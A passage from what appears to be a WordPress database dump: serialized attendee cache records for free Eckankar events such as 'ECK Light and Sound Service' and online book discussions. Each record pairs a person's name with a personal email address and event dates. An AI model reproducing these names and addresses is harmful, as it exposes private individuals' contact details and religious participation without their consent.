Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1668335400:1668382200\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1668335400;s:20:\"ticket_timestamp_end\";i:1668382200;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438080,'KLW43515_cached','a:1:{i:0;a:24:{s:5:\"email\";s:21:\"sandykarlic@gmail.com\";s:4:\"name\";s:25:\"Sandy(Tarzana California)\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:32:\"Experience HU, The Sound of Soul\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1667730600:1667777400\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1667730600;s:20:\"ticket_timestamp_end\";i:1667777400;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438081,'QTD92990_cached','a:1:{i:0;a:24:{s:5:\"email\";s:17:\"rumipaz@gmail.com\";s:4:\"name\";s:12:\"Alberto Ruiz\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:32:\"Experience HU, The Sound of Soul\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1667730600:1667777400\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1667730600;s:20:\"ticket_timestamp_end\";i:1667777400;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438082,'BRH36761_cached','a:1:{i:0;a:24:{s:5:\"email\";s:21:\"huusinger@comcast.net\";s:4:\"name\";s:6:\"Gordon\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:32:\"Experience HU, The Sound of Soul\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1667730600:1667777400\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1667730600;s:20:\"ticket_timestamp_end\";i:1667777400;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438083,'BJA68504_cached','a:1:{i:0;a:24:{s:5:\"email\";s:20:\"Raelinharp@yahoo.com\";s:4:\"name\";s:6:\"Raelin\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:32:\"Experience HU, The Sound of Soul\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1667730600:1667777400\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1667730600;s:20:\"ticket_timestamp_end\";i:1667777400;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438084,'MOF87584_cached','a:1:{i:0;a:24:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Those Wonderful ECK Masters\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1665920700:1665925200\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1665920700;s:20:\"ticket_timestamp_end\";i:1665925200;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438085,'RCO64499_cached','a:1:{i:0;a:24:{s:5:\"email\";s:26:\"colleynadanler@hotmail.com\";s:4:\"name\";s:15:\"Colleyna Danler\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Those Wonderful ECK Masters\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1665920700:1665925200\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1665920700;s:20:\"ticket_timestamp_end\";i:1665925200;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438086,'CBT92815_cached','a:1:{i:0;a:24:{s:5:\"email\";s:26:\"colleynadanler@hotmail.com\";s:4:\"name\";s:15:\"Colleyna Danler\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Those Wonderful ECK Masters\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1665920700:1665925200\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1665920700;s:20:\"ticket_timestamp_end\";i:1665925200;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438087,'GZD40069_cached','a:1:{i:0;a:24:{s:5:\"email\";s:21:\"sandykarlic@gmail.com\";s:4:\"name\";s:25:\"Sandy(Tarzana California)\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Those Wonderful ECK Masters\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1665920700:1665925200\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1665920700;s:20:\"ticket_timestamp_end\";i:1665925200;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438088,'ENJ93195_cached','a:1:{i:0;a:24:{s:5:\"email\";s:19:\"keanchico@yahoo.com\";s:4:\"name\";s:5:\"Kery \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Those Wonderful ECK Masters\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1665920700:1665925200\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1665920700;s:20:\"ticket_timestamp_end\";i:1665925200;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438089,'TOD81749_cached','a:1:{i:0;a:24:{s:5:\"email\";s:19:\"keanchico@yahoo.com\";s:4:\"name\";s:12:\"Kery Colvin \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Those Wonderful ECK Masters\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1665920700:1665925200\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1665920700;s:20:\"ticket_timestamp_end\";i:1665925200;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438090,'MUA58591_cached','a:1:{i:0;a:24:{s:5:\"email\";s:17:\"rhoann9@gmail.com\";s:4:\"name\";s:13:\"Rhonda Miller\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1665311400:1665358200\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1665311400;s:20:\"ticket_timestamp_end\";i:1665358200;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438091,'NYM84882_cached','a:1:{i:0;a:24:{s:5:\"email\";s:20:\"MVEpianist@gmail.com\";s:4:\"name\";s:17:\"Marcia Van Egmond\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1665311400:1665358200\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1665311400;s:20:\"ticket_timestamp_end\";i:1665358200;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438092,'TXR11723_cached','a:1:{i:0;a:24:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:9:\"Bonnie G.\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1665311400:1665358200\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1665311400;s:20:\"ticket_timestamp_end\";i:1665358200;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438093,'BGC33180_cached','a:1:{i:0;a:24:{s:5:\"email\";s:18:\"beth1848@yahoo.com\";s:4:\"name\";s:4:\"Beth\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1665311400:1665358200\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1665311400;s:20:\"ticket_timestamp_end\";i:1665358200;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438094,'HPM19481_cached','a:1:{i:0;a:24:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Wisdom of the Heart, Book 4\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1663700400:1663704000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1663700400;s:20:\"ticket_timestamp_end\";i:1663705800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438095,'NVE31441_cached','a:1:{i:0;a:24:{s:5:\"email\";s:18:\"zgraff@charter.net\";s:4:\"name\";s:13:\"Carolyn Graff\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Wisdom of the Heart, Book 4\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1663700400:1663704000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1663700400;s:20:\"ticket_timestamp_end\";i:1663705800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438096,'YHT98148_cached','a:1:{i:0;a:24:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Wisdom of the Heart, Book 4\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1663700400:1663704000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1663700400;s:20:\"ticket_timestamp_end\";i:1663705800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438097,'GUZ25189_cached','a:1:{i:0;a:24:{s:5:\"email\";s:18:\"zgraff@charter.net\";s:4:\"name\";s:13:\"Carolyn Graff\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Those Wonderful ECK Masters\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1663501500:1663506000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1663501500;s:20:\"ticket_timestamp_end\";i:1663506000;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438098,'CNR30256_cached','a:1:{i:0;a:24:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Those Wonderful ECK Masters\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1663501500:1663506000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1663501500;s:20:\"ticket_timestamp_end\";i:1663506000;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438099,'AYU51854_cached','a:1:{i:0;a:24:{s:5:\"email\";s:26:\"colleynadanler@hotmail.com\";s:4:\"name\";s:15:\"Colleyna Danler\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Those Wonderful ECK Masters\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1663501500:1663506000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1663501500;s:20:\"ticket_timestamp_end\";i:1663506000;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438100,'EOH55126_cached','a:1:{i:0;a:24:{s:5:\"email\";s:19:\"keanchico@yahoo.com\";s:4:\"name\";s:11:\"kery colvin\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Those Wonderful ECK Masters\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1663501500:1663506000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1663501500;s:20:\"ticket_timestamp_end\";i:1663506000;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438101,'PAV22929_cached','a:1:{i:0;a:24:{s:5:\"email\";s:18:\"tomw2891@gmail.com\";s:4:\"name\";s:11:\"Tom Walker \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1662892200:1662895800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1662892200;s:20:\"ticket_timestamp_end\";i:1662895800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438102,'GWX12508_cached','a:1:{i:0;a:24:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:8:\"Bonnie G\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1662892200:1662895800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1662892200;s:20:\"ticket_timestamp_end\";i:1662895800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438103,'JUN71113_cached','a:1:{i:0;a:24:{s:5:\"email\";s:18:\"tomw2891@gmail.com\";s:4:\"name\";s:10:\"Tom walker\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1662892200:1662895800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1662892200;s:20:\"ticket_timestamp_end\";i:1662895800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438104,'TRL39941_cached','a:1:{i:0;a:24:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:14:\"Jorge Santiago\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1662892200:1662895800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1662892200;s:20:\"ticket_timestamp_end\";i:1662895800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438105,'KLB99384_cached','a:1:{i:0;a:24:{s:5:\"email\";s:21:\"pennycole57@gmail.com\";s:4:\"name\";s:5:\"Penny\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1662892200:1662895800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1662892200;s:20:\"ticket_timestamp_end\";i:1662895800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438106,'SXK40420_cached','a:1:{i:0;a:24:{s:5:\"email\";s:18:\"beth1848@yahoo.com\";s:4:\"name\";s:7:\"Frances\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound 